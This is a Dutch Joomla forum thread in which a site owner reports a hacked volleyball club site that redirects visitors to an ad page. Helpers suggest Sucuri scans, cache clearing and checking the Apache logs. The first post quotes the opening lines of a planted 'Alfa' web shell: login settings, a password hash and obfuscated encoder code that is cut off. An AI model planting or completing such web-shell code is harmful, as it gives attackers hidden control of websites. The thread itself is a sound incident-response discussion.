PHP 7.3.x nog een uitdaging voor veel beheerders van websites.

12 jan 2019

Diverse hosters zijn van PHP 5.x.x en PHP 7.x.x automatisch overgeschakeld naar PHP 7.3.x. Als je Joomla website en de gebruikte extensies (componenten, plugins en modules) niet up-to-date zijn kan hierdoor je website niet meer werken.
Lees meer...

Pagina:
1
2

Onderwerp: Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #1

nkamp
Onderwerp Auteur
Offline
Expert Boarder
Berichten: 80
Ontvangen bedankjes 0

Hallo,

Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de volleybalsitevolleybalsite ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:

contacts.php
pagenews.php
userloader.php

De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:

<?php
$GLOBALS['Alfa_User'] = 'admin';
$GLOBALS['Alfa_Pass'] = '8a4bf282852bf4c49e17f0951f645e72';
$GLOBALS['Alfa_Protect_Shell'] = '1';
$GLOBALS['Alfa_Login_Page'] = '404';
$GLOBALS['Alfa_Show_Icons'] = '1';

if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEF

De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?

Ik heb de site afgelopen week naar 3.8.1 gebracht.

Bedankt,

Nico

Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #2

Leen Offline Administrator Geen zorgen voor de dag van morgen Berichten: 3994 Karma: 3 Ontvangen bedankjes 125	Hallo Nico, Die 3 bestanden in je root weet niet waar ze vandaan komen normaal staan ze daar niet . Maar als je een akeeba back-up heb terug gezet maak je van te voren dan wel goed die map leeg. En nadien goed eerst alle modules en extensies en plug-in controleren op Updates voor je weer echt gaat Update naar nieuwe versie M.v.g Leen Bijlagen:
	Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #3

Leen Offline Administrator Geen zorgen voor de dag van morgen Berichten: 3994 Karma: 3 Ontvangen bedankjes 125	Heb nog even je site laten scannen bij sucuri scan en zo te zien heb je iets opgelopen M.v.g Leen Bijlagen: De volgende gebruiker (s) zei dank u: nkamp
	Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #4

nkamp
Onderwerp Auteur
Offline
Expert Boarder
Berichten: 80
Ontvangen bedankjes 0

Hallo,

Aan die sucuri had ik weer even niet gedacht, bedankt!

Maar ik heb het volgens mij gevonden, het zat in de index.php van de template (shape5). Ik heb het daar uitgehaald. Ik heb nu alle files door gescanned op wat sucuri aangeeft, ik heb de database doorzocht door de dump te doorzoeken op de tekens die sucuri aan geeft, niets meer gevonden of kunnen vinden!

Maar sucuri geeft nog steeds dat het wat vindt? Ook als ik view source in de browser doe, kan ik wat sucuri aan geeft, niet vinden.

Hoe kom ik er nu achter of de site nu wel of niet schoon is?

Gr.,

Nico

Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #5

Ron Offline Administrator Berichten: 2118 Karma: 2 Ontvangen bedankjes 70	Misschien je cache van je site even opschonen. En dan nogmaals scan uitvoeren! Groeten Ron Bent u opzoek naar een een Hotel in Sauerland voor uw motor, Fiets en wandelvakantie dan zit u bij Hotel Landgasthof Grevenstein op het juiste adres! Handelsregister-Nr: HRA6354 Amtsgericht: Arnsberg
	Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 2 jaren 7 maanden geleden #6

Otto
Offline
Administrator
Er bestaan geen domme vragen
Berichten: 1284
Karma: 1
Ontvangen bedankjes 50

Hoi Nico,

Vergeet niet je Apache logs door te spitten en te onderzoeken hoe men binnen gekomen is.
- Via een besmette pc?
- Een kwetsbare extensie?
- het te laat updaten van Joomla
- Verkeerd toegewezen rechten aan mappen en bestanden

Op deze manier doe je namelijk alleen maar aan symptoombestrijding.

Artenweb.nl creatieve unieke Joomla en VirtueMart websites!
Vragen allen via dit Forum!
KvK: 61932647 - Voor onderscheidende Joomla sites die werken!

Gelieve Inloggen of een account aanmaken om deel te nemen aan het gesprek.

Pagina:
1
2

Forum

Joomla 3.0

Joomla 3.0 - Veiligheid

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...

Tijd voor maken pagina: 0.312 seconden

Gemaakt door Kunena